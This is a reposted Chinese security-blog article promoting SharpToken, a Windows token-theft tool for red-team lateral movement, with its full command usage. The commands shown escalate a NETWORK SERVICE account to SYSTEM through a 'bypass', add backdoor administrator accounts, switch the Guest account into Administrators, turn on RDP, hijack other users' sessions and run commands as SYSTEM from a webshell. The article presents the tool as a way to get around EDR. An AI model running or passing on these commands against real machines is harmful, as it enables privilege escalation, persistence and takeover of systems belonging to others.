提权神器!Windows令牌窃取专家

admin 2023年5月16日08:41:04评论81 views字数 1993阅读6分38秒阅读模式

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

工具介绍

在红队横向移动的过程中,我们经常需要窃取其他用户的权限。在现代 EDR 的防御下,我们很难使用 Mimikatz 获取其他用户的权限,如果目标用户没有活着的进程,我们也没有办法使用“OpenProcessToken”来窃取 Token。

SharpToken 是一种利用令牌泄漏的工具,它可以从系统中的所有进程中找到泄漏的令牌并使用它们,如果你是低权限服务用户,你甚至可以用它升级到“NT AUTHORITYSYSTEM”权限,无需目标用户的密码就可以切换到目标用户的桌面做更多的事情。

工具用法

SharpToken By BeichenDream=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITYNETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORITYSYSTEMe.g.SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami" bypass
Usage:SharpToken COMMAND arguments
COMMANDS:        list_token [process pid]        [bypass]        list_all_token [process pid] [bypass]        add_user    <username> <password> [group] [domain] [bypass]        enableUser <username> <NewPassword> [NewGroup] [bypass]        delete_user <username> [domain] [bypass]        execute <tokenUser> <commandLine> [Interactive] [bypass]        enableRDP [bypass]        tscon <targetSessionId> [sourceSessionId] [bypass]
example:    SharpToken list_token    SharpToken list_token bypass    SharpToken list_token 6543    SharpToken add_user admin Abcd1234! Administrators    SharpToken enableUser Guest Abcd1234! Administrators    SharpToken delete_user admin    SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"    SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami" bypass    SharpToken execute "NT AUTHORITYSYSTEM" cmd true    SharpToken execute "NT AUTHORITYSYSTEM" cmd true bypass    SharpToken tscon 1

提权神器!Windows令牌窃取专家

提升权限

了通常的Token窃取权限增强,SharpToken还支持通过Bypass获取完整的Token。

如果你是NT AUTHORITY/NETWORK SERVICE用户,你添加了bypass参数,SharpToken会从RPCSS窃取System,即无条件的NT AUTHORITYNETWORK SERVICE到NT AUTHORITYSYSTEM
提权神器!Windows令牌窃取专家

ListToken

枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组位于)

SharpToken list_token
提权神器!Windows令牌窃取专家

枚举来自指定进程的令牌

SharpToken list_token 468
提权神器!Windows令牌窃取专家

获取交互式shell

execute "NT AUTHORITYSYSTEM" cmd true
提权神器!Windows令牌窃取专家

获取命令执行结果(在webshell下执行)

SharpToken execute "NT AUTHORITYSYSTEM" "cmd /c whoami"

提权神器!Windows令牌窃取专家

......

下载地址

https://github.com/BeichenDream/SharpToken

原文始发于微信公众号(Hack分享吧):提权神器!Windows令牌窃取专家

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月16日08:41:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   提权神器!Windows令牌窃取专家http://cn-sec.com/archives/1714890.html

发表评论

匿名网友 填写信息